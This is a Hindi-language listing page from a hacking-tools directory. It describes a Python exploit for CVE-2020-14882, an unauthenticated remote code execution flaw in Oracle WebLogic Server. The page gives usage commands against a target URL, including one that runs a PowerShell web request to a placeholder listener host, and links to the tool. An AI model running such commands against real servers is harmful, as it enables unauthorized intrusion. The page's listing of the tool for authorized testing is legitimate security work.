Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/danny-lli/cve-2020-14882
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

यह स्क्रिप्ट Oracle WebLogic Server पर रिमोट कोड निष्पादन (RCE) की अनुमति देती है।

रिपॉजिटरी देखें
2123 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-14882

यह स्क्रिप्ट Oracle WebLogic Server पर एक अप्रमाणित GET अनुरोध का उपयोग करके रिमोट कोड निष्पादन (RCE) सक्षम बनाती है। यह CVE-2020-14882 भेद्यता का शोषण करती है। मनमाने कमांड निष्पादित करके, एक हमलावर सर्वर तक अनधिकृत पहुंच प्राप्त कर सकता है।

एक्सप्लॉइट विवरण

  • एक्सप्लॉइट शीर्षक: Oracle WebLogic Server, GET अनुरोध के माध्यम से अप्रमाणित RCE
  • एक्सप्लॉइट लेखक: Danny Safaya
  • CVE: CVE-2020-14882
  • विक्रेता होमपेज: Oracle WebLogic Server
  • सॉफ्टवेयर लिंक: Oracle Middleware Downloads
  • अधिक जानकारी: केवल एक GET अनुरोध द्वारा WebLogic RCE (CVE-2020-14882) विश्लेषण

उपयोग

सुनिश्चित करें कि आपके पास Python 3 स्थापित है। इस स्क्रिप्ट का उपयोग करने के लिए, नीचे दिए गए चरणों का पालन करें:

  1. एक टर्मिनल या कमांड प्रॉम्प्ट खोलें।

  2. निम्न कमांड का उपयोग करके स्क्रिप्ट चलाएँ:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 command
    

    http(s)://target:7001 को Oracle WebLogic Server के लक्षित URL से बदलें, और command को निष्पादित करने के लिए वांछित कमांड से बदलें।

उदाहरण 1:

root@kitploit:~
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"

यह उदाहरण लक्षित सर्वर पर nslookup your_Domain कमांड निष्पादित करता है।

उदाहरण 2:

root@kitploit:~
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"

यह उदाहरण लक्षित सर्वर पर PowerShell कमांड Invoke-WebRequest -Uri http://your_listener निष्पादित करता है।

चेतावनी

यह स्क्रिप्ट केवल अधिकृत पेनिट्रेशन परीक्षण और सुरक्षा अनुसंधान उद्देश्यों के लिए है। उचित सहमति के बिना सिस्टम का शोषण करने के लिए इस स्क्रिप्ट का अनधिकृत उपयोग अवैध है और इसके कानूनी परिणाम हो सकते हैं। इसे अपने जोखिम पर उपयोग करें।

निर्भरताएँ

इस स्क्रिप्ट को निम्नलिखित निर्भरताओं की आवश्यकता है:

  • requests
  • urllib3

कृपया सुनिश्चित करें कि स्क्रिप्ट चलाने से पहले ये निर्भरताएँ स्थापित हैं।

टूल डाउनलोड करें